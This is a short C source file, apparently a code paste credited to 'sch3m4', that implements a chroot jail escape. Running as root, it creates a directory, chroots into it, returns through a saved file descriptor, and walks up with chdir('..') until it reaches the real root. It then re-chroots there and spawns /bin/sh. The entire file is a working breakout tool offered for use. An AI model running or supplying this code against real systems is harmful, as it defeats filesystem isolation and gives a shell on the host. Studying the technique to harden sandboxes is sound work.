/*Chema Garcia (a.k.a. sch3m4)sch3m4@opensec.eshttp://opensec.es*/

1. /*
2. Chema Garcia (a.k.a. sch3m4)
3.  
4. sch3m4@opensec.es
5.  
6. http://opensec.es
7.  
8. */
9.  
10. #include <stdlib.h>
11. #include <stdio.h>
12. #include <sys/stat.h>
13. #include <sys/types.h>
14. #include <fcntl.h>
15. #include <unistd.h>
16. #include <pwd.h>
17.  
18. #define FOLDER      "chbrk"
19. #define PERM        0700
20. #define MAX_CHDIR   200
21.  
22. #define SHELL       "/bin/sh"
23.  
24. int main()
25. {
26.     int           fd;
27.     struct stat   statf;
28.     ino_t         aux;
29.     unsigned int  cont;
30.     struct passwd *owner;
31.     char          *directory;
32.  
33.     if(getuid()!=0)
34.     {
35.         fprintf(stderr,"\nThis program cannot work without root privileges\n");
36.         return -1;
37.     }
38.  
39.     fd=open(".",O_RDONLY);
40.     mkdir(FOLDER,PERM);
41.     chroot(FOLDER);
42.     fchdir(fd);
43.     close(fd);
44.  
45.     aux=0;
46.     cont=0;
47.     while(!stat(".",&statf) && aux!=statf.st_ino && cont++ < MAX_CHDIR)
48.     {
49.         aux=statf.st_ino;
50.         chdir("..");
51.     }
52.  
53.     if(aux==statf.st_ino)
54.     {
55.         chroot(".");
56.         owner=getpwuid(statf.st_uid);
57.  
58.         directory=getcwd(0,0);
59.         fprintf(stderr,"\n+=[ Done! ]=+\n");
60.         fprintf(stderr,"\n+ Directory:  %s",directory);
61.         fprintf(stderr,"\n+ Inode:      %d",(int)statf.st_ino);
62.         fprintf(stderr,"\n+ Owner:      id=%d (%s) / gid=%d \n\n",owner->pw_uid,owner->pw_name,owner->pw_gid);
63.         free(directory);
64.  
65.         execl(SHELL,(char*)0,(char*)0);
66.     }
67.  
68.    return 0;
69. }